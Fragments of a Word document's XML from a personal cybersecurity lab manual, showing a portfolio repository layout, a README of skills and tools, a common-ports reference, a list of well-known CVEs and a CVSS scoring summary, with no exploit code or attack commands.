        <w:t xml:space="preserve">📁 Final GitHub Repository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cybersecurity-portfolio/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├── README.md                        # Main portfolio page — skills, tools, links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├── 00-python-scripts/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│   ├── README.md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│   ├── port_scanner.py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│   └── log_parser.py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├── 01-cryptography/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│   ├── README.md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│   ├── salting-demo.py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│   └── File-Integrity-Report.pdf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├── 02-os-security/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│   ├── README.md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│   └── OS-Enumeration-Cheatsheet.pdf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├── 03-vulnerability-assessment/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│   ├── README.md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│   ├── VA-Report-v1.pdf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│   ├── Nessus-vs-OpenVAS-Comparison.pdf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│   └── nmap-full.txt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├── 04-web-security/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│   ├── README.md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│   ├── XSS-Finding-Report.pdf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│   ├── SQLi-Finding-Report.pdf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│   ├── WordPress-Security-Audit-Report.pdf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│   └── OTT-App-Security-Checklist.pdf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├── 05-soc-analysis/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│   ├── README.md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│   ├── SSH-Brute-Force-Triage-Ticket.pdf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│   ├── SPL-Query-Cheatsheet.pdf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│   ├── Windows-Event-IDs-Reference.pdf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│   └── IR-Playbook-Ransomware.pdf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├── 06-active-directory/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│   ├── README.md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│   ├── AD-Attack-Chain-Report.pdf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│   ├── AD-Defense-Checklist.pdf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│   └── BloodHound-screenshot.png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└── 07-exploitation/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    ├── README.md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    ├── EternalBlue-Attack-Chain-Report.pdf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    ├── PrivEsc-Linux-Report.pdf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    └── PrivEsc-Windows-Report.pdf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240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">💡 Main README.md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 🛡️ Cybersecurity Portfolio — Irfan Rafiq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## About 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MSc Computer Science (2024) | OTT &amp; Smart TV Developer → Cybersecurity Analyst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10+ years software development | Based in Lahore/Kasur, Pakistan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Actively seeking Junior Cybersecurity Analyst roles in Lahore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## Skills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| Category | Tools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|---|---|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| Network Scanning | Nmap, Masscan, Wireshark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| Vulnerability Assessment | OpenVAS, Nessus Essentials, CVSS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| Web Security | Burp Suite, OWASP ZAP, wpscan, sqlmap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| Exploitation | Metasploit, Impacket, EternalBlue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| Active Directory | BloodHound, enum4linux, Kerberoasting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| SIEM/SOC | Splunk, Wazuh, Windows Event Logs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| Scripting | Python, Bash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| Platforms | Kali Linux, Ubuntu, Windows Server 2022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## Featured Reports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- [VA Report v1](03-vulnerability-assessment/VA-Report-v1.pdf)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- [WordPress Security Audit](04-web-security/WordPress-Security-Audit-Report.pdf)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- [EternalBlue Attack Chain](07-exploitation/EternalBlue-Attack-Chain-Report.pdf)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- [Active Directory Attack + Defense](06-active-directory/AD-Attack-Chain-Report.pdf)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## Certifications In Progress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- 🎯 eJPT (Target: July 2026)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- 📚 Google Cybersecurity Certificate (In Progress)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## Contact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LinkedIn: linkedin.com/in/irfanrafiq | GitHub: github.com/IrfanRa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4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📋 APPENDIX — Quick Reference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Port Number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 / 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20/21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FTP (data/control) — cleartext, insecure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— secure remote shell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Telnet — cleartext (very old, avoid)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 — email sending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 — domain name resolution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67/68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DHCP server/client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— web (unencrypted)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POP3 — email retrieval (old)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IMAP — email retrieval (modern)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LDAP — Active Directory queries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— encrypted web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SMB — Windows file sharing (EternalBlue!)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3306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— database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3389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RDP — Windows Remote Desktop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5900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VNC — remote desktop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alternate / dev servers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1433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MSSQL — Microsoft SQL Server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5432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— database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27017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— NoSQL database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6379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— in-memory cache (often unauthenticated!)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Commonly Used CVEs — Know These by Heart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CVE-2017-0144 (MS17-010)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SMBv1 RCE — Windows 7/Server 2008 — EternalBlue — CRITICAL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CVE-2019-0708 (BlueKeep)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RDP pre-auth RCE — Windows XP-2008 — CRITICAL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CVE-2021-44228 (Log4Shell)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Log4j JNDI injection — affects Java apps using Log4j — CRITICAL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CVE-2021-34527 (PrintNightmare)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Print Spooler RCE/PrivEsc — affects all Windows — HIGH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CVE-2014-0160 (Heartbleed)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OpenSSL memory disclosure — leaks private keys — HIGH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CVE-2014-6271 (Shellshock)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Bash remote code execution — Linux/Unix systems — CRITICAL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CVE-2017-5638 (Struts RCE)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Struts RCE — used in Equifax breach — CRITICAL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CVE-2020-1472 (Zerologon)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Netlogon PrivEsc — Domain Controller takeover — CRITICAL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CVSS v3.1 Scoring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 Vector (AV)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N=Network, A=Adjacent, L=Local, P=Physical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 Complexity (AC)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L=Low (reliable), H=High (special conditions)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Privileges Required (PR)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N=None, L=Low, H=High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Interaction (UI)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N=None, R=Required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(S)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U=Unchanged, C=Changed (to other components)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Confidentiality (C)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N=None, L=Low, H=High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Integrity (I)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N=None, L=Low, H=High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 (A)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N=None, L=Low, H=High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Example: EternalBlue CVSS = AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H = 8.1 High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Calculator: https://www.first.org/cvss/calculator/3.1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🎯 FINAL REMINDER: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Every lab you do = 1 GitHub commit + 1 screenshot saved. Every report = 1 PDF in GitHub. After 45 days, when a recruiter asks 'show me your work' — you open your GitHub and say 'here it is.' That is what gets you the job.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3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Irfan Rafiq Cybersecurity Lab Manual 2026  |  For personal use only — authorized lab environments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3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Irfan Rafiq — Cybersecurity Lab Manual 2026  |  </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="2E75B6"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">github.com/IrfanRa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40"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="53813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2026-05-17T13:17:53.648Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-17T13:17:53.661Z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